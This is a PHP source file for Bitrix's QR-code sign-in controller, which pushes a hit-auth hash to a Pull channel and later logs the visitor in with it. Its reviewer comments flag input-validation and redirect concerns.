<?php

/**
 * Bitrix Framework
 * @package bitrix
 * @subpackage main
 * @copyright 2001-2021 Bitrix
 */
namespace Bitrix\Main\Controller;

use Bitrix\Main;
use Bitrix\Main\Config;
use Bitrix\Main\Security;
use Bitrix\Main\Localization\Loc;
use Bitrix\Pull;

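/**
 * Controller for QR-code sign-in.
 *
 * pushToken() obtains a hit-auth hash from \CUser and delivers it over a Pull
 * channel; authenticateAction() later exchanges such a hash for a session via
 * $USER->LoginHitByHash().
 *
 * Security notes for reviewers:
 * - authenticateAction() is reachable without a session (see configureActions()),
 *   so everything it receives is untrusted request data.
 * - The hash is sent to whichever channel tag the caller names. Nothing in this
 *   class ties that tag to a particular browser; presumably the tag is an
 *   unguessable value embedded in the QR code — TODO confirm where it is issued.
 */
class QrCodeAuth extends Main\Engine\Controller
{
	/**
	 * Checks that QR-code sign-in is enabled and that the Pull queue server is usable.
	 *
	 * On failure an error is added to the controller (ERR_OPTION or ERR_PULL).
	 *
	 * @return bool True when the 'main'/'allow_qrcode_auth' option equals 'Y', the 'pull'
	 *              module loads and \CPullOptions::GetQueueServerStatus() is truthy.
	 */
	public function isAllowed()
	{
		// The feature is opt-in: the option defaults to 'N'.
		if (Config\Option::get('main', 'allow_qrcode_auth', 'N') !== 'Y')
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_option'), 'ERR_OPTION'));
			return false;
		}

		// Short-circuit keeps \CPullOptions from being touched when the module cannot be loaded.
		if (!Main\Loader::includeModule('pull') || !\CPullOptions::GetQueueServerStatus())
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_pull'), 'ERR_PULL'));
			return false;
		}

		return true;
	}

	/**
	 * Controller action wrapper around pushToken().
	 *
	 * The result of pushToken() is discarded, so the caller learns about a failure
	 * only through the errors that pushToken() adds to the controller.
	 *
	 * @param string $siteId
	 * @param string $uniqueId
	 * @param string $channelTag
	 * @param string $redirectUrl
	 * @return void
	 */
	public function pushTokenAction($siteId, $uniqueId, $channelTag, $redirectUrl = '')
	{
		$this->pushToken($siteId, $uniqueId, $channelTag, $redirectUrl);
	}

	/**
	 * Signs the current visitor in with a hit-auth hash.
	 *
	 * The Authentication prefilter is removed for this action in configureActions(),
	 * so $token is untrusted input from a client that has no session yet.
	 *
	 * @param string $token Hit-auth hash, as delivered by pushToken().
	 * @param bool $remember Passed through to LoginHitByHash(); presumably a "remember me" flag — TODO confirm.
	 * @return bool|null True on success, null when the token is missing, not a string, or rejected.
	 */
	public function authenticateAction($token, bool $remember = false)
	{
		global $USER;

		// $token is untyped, so a request may supply an array or another non-string
		// value; reject those here instead of handing them to LoginHitByHash().
		// For string input this is the same test as the former `$token == ''`.
		if (!is_string($token) || $token === '')
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_request'), "ERR_PARAMS"));
			return null;
		}

		// NOTE(review): the meaning of the positional false/true arguments is defined
		// by CUser::LoginHitByHash() and is not visible here — confirm against its signature.
		if (!$USER->LoginHitByHash($token, false, true, $remember))
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_auth'), "ERR_AUTH"));
			return null;
		}

		return true;
	}

	/**
	 * Adds a token and sends a message to p&p.
	 *
	 * Order of operations:
	 * 1. reject empty $siteId / $uniqueId / $channelTag (ERR_PARAMS);
	 * 2. fire 'main'/'OnPushQrCodeAuthToken'; if any handler is subscribed, the first
	 *    result decides the outcome and the steps below are skipped;
	 * 3. compare $uniqueId with getUniqueId() (ERR_UNIQUE_ID);
	 * 4. check isAllowed();
	 * 5. get or create a hit-auth hash for the URL and push it to the channel.
	 *
	 * @param string $siteId
	 * @param string $uniqueId
	 * @param string $channelTag
	 * @param string $redirectUrl Forwarded unchanged to the event and to the Pull message.
	 * @param string|null $currentUrl URL the hash is bound to; defaults to the requested page.
	 * @return bool|null True on success, null on any failure.
	 * @throws Main\LoaderException
	 */
	public function pushToken($siteId, $uniqueId, $channelTag, $redirectUrl = '', $currentUrl = null)
	{
		// Loose comparison: null, false and '' all count as "missing".
		if ($siteId == '' || $uniqueId == '' || $channelTag == '')
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_request'), 'ERR_PARAMS'));
			return null;
		}

		$event = new \Bitrix\Main\Event(
			'main',
			'OnPushQrCodeAuthToken',
			[
				'siteId' => $siteId,
				'uniqueId' => $uniqueId,
				'channelTag' => $channelTag,
				'redirectUrl' => $redirectUrl,
			]
		);
		$event->send();
		// Both branches of the loop body return, so only the first handler result is
		// ever examined. A handler therefore takes over the whole operation: the
		// unique-id comparison, the isAllowed() gate and the built-in Pull delivery
		// below are all skipped, and any equivalent checks are the handler's job.
		/** @var \Bitrix\Main\EventResult $eventResult */
		foreach ($event->getResults() as $eventResult)
		{
			if ($eventResult->getType() === \Bitrix\Main\EventResult::ERROR)
			{
				$error = $eventResult->getParameters()['error'] ?? null;
				if ($error instanceof Main\Error)
				{
					$this->addError($error);
				}
				if (is_string($error) && $error !== '')
				{
					$this->addError(new Main\Error($error, 'ERR_FROM_EVENT'));
				}

				// NOTE(review): when the handler supplies no usable 'error' value, null is
				// returned without any controller error being recorded, so pushTokenAction()
				// gives its caller no failure signal in that case.
				return null;
			}

			return true;
		}

		// Strict comparison, so a non-string $uniqueId never matches.
		if ($uniqueId !== static::getUniqueId())
		{
			$this->addError(new Main\Error(Loc::getMessage('qrcodeauth_error_unique_id'), 'ERR_UNIQUE_ID'));
			return null;
		}

		// isAllowed() has already added ERR_OPTION or ERR_PULL when it returns false.
		if (!$this->isAllowed())
		{
			return null;
		}

		// The channel is chosen solely by the caller-supplied tag.
		$channel = Pull\Model\Channel::createWithTag($channelTag);

		$url = $currentUrl ?? Main\Context::getCurrent()->getRequest()->getRequestedPage();

		// Reuse an existing hash for this URL and site if there is one, otherwise create it.
		// NOTE(review): the second argument is false in both calls; presumably that selects
		// the currently authorized user — confirm against CUser.
		$token = \CUser::GetHitAuthHash($url, false, $siteId);
		if ($token === false)
		{
			$token = \CUser::AddHitAuthHash($url, false, $siteId);
		}

		// $redirectUrl is relayed as received; this method does not validate it, so the
		// consumer of the 'qrAuthorize' command has to restrict where it navigates.
		// 'expiry' is interpreted by the Pull module (presumably seconds — TODO confirm).
		Pull\Event::add(
			[$channel],
			[
				'module_id' => 'main',
				'command' => 'qrAuthorize',
				'expiry' => 60,
				'params' => [
					'token' => $token,
					'redirectUrl' => $redirectUrl,
				],
			]
		);

		return true;
	}

	/**
	 * Returns the identifier stored in the 'main'/'~public_uniq_id' option, creating it on first use.
	 *
	 * The option name suggests the value is public rather than secret, which fits the
	 * plain `!==` comparison in pushToken().
	 *
	 * @return string
	 */
	public static function getUniqueId()
	{
		$uniqid = Config\Option::get('main', '~public_uniq_id', '');

		if ($uniqid == '')
		{
			// Generated once and persisted. There is no locking in this method, so two
			// concurrent first calls could each store a different value.
			$uniqid = Security\Random::getString(16, true);
			Config\Option::set('main', '~public_uniq_id', $uniqid);
		}

		return $uniqid;
	}

	/**
	 * Per-action filter configuration.
	 *
	 * Removes the Authentication prefilter from the 'authenticate' action, which has to
	 * be callable before the visitor is signed in. Whatever other default prefilters the
	 * base controller applies are not overridden here.
	 *
	 * @return array
	 */
	public function configureActions()
	{
		return [
			'authenticate' => [
				'-prefilters' => [
					Main\Engine\ActionFilter\Authentication::class,
				],
			],
		];
	}
}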
